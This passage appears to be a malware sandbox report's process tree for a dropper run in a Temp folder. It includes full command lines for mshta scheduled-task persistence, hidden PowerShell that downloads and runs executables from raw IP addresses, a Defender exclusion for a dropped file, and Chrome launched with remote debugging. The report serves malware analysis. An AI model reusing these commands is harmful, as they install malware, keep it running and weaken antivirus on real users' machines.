PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 3016	2568	MCxU5Fj.exe	50
PID 2568 wrote to memory of 2736	2568	MCxU5Fj.exe	51

C:\Users\Admin\AppData\Local\Temp\7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe
"C:\Users\Admin\AppData\Local\Temp\7fca072b4b527dc77d56942313c4b33aeea3218343497694116a69b07fa1057d.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn LIroUmayngH /tr "mshta C:\Users\Admin\AppData\Local\Temp\YuklGPM0w.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn LIroUmayngH /tr "mshta C:\Users\Admin\AppData\Local\Temp\YuklGPM0w.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2260
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\YuklGPM0w.hta
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Users\Admin\AppData\Local\TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE
      "C:\Users\Admin\AppData\Local\TempLGIL2NF8SQF6MIRZHUBAB6NGMEMLKTBJ.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2684
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1656
      - C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2556
      - C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2380
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BA3B.tmp\BA3C.tmp\BA3D.bat C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
      - C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1628
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 1204
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2928
      - C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3016
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1036
        8⤵
        Loads dropped DLL
        Program crash
        
        PID:2956
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 500
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2736
      - C:\Users\Admin\AppData\Local\Temp\10110230101\ce4pMzk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110230101\ce4pMzk.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\zHoisLDD\Anubis.exe""
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2504
      - C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:1700
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2269758,0x7fef2269768,0x7fef2269778
        9⤵
        
        PID:2292
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        9⤵
        
        PID:3068
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:2
        9⤵
        
        PID:3812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:8
        9⤵
        
        PID:2536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:8
        9⤵
        
        PID:1280
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2324 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4068
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2348 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2688 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:2
        9⤵
        
        PID:3104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2228 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2412
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3476 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:8
        9⤵
        
        PID:3752
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3596 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:8
        9⤵
        
        PID:2180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3732 --field-trial-handle=1364,i,6530401133983384531,12424283170488365044,131072 /prefetch:8
        9⤵
        
        PID:3696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:3780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2269758,0x7fef2269768,0x7fef2269778
        9⤵
        
        PID:1792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:2
        9⤵
        
        PID:2628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:8
        9⤵
        
        PID:2304
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:8
        9⤵
        
        PID:1624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2308 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2320 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1392 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:2
        9⤵
        
        PID:3096
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3228 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:288
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3464 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:8
        9⤵
        
        PID:3152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3484 --field-trial-handle=1380,i,30299301625886011,17023203757708196677,131072 /prefetch:8
        9⤵
        
        PID:1940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:2592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2269758,0x7fef2269768,0x7fef2269778
        9⤵
        
        PID:4016
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:2
        9⤵
        
        PID:3212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:8
        9⤵
        
        PID:2088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:8
        9⤵
        
        PID:3772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2172 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2180 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:2212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1484 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:2
        9⤵
        
        PID:3908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3304 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3228
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1384 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:8
        9⤵
        
        PID:632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3592 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:8
        9⤵
        
        PID:352
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3764 --field-trial-handle=1376,i,6622215749706418198,14358714483632960194,131072 /prefetch:8
        9⤵
        
        PID:3956
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Guest Profile"
        8⤵
        Uses browser remote debugging
        
        PID:3432
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef66b9758,0x7fef66b9768,0x7fef66b9778
        9⤵
        
        PID:3796
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1120 --field-trial-handle=1288,i,10730496149954833819,3462560615265395091,131072 /prefetch:2
        9⤵
        
        PID:4012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1288,i,10730496149954833819,3462560615265395091,131072 /prefetch:8
        9⤵
        
        PID:3960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1288,i,10730496149954833819,3462560615265395091,131072 /prefetch:8
        9⤵
        
        PID:2200
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1288,i,10730496149954833819,3462560615265395091,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2616 --field-trial-handle=1288,i,10730496149954833819,3462560615265395091,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3380
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2632 --field-trial-handle=1288,i,10730496149954833819,3462560615265395091,131072 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1300 --field-trial-handle=1288,i,10730496149954833819,3462560615265395091,131072 /prefetch:2
        9⤵
        
        PID:3772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
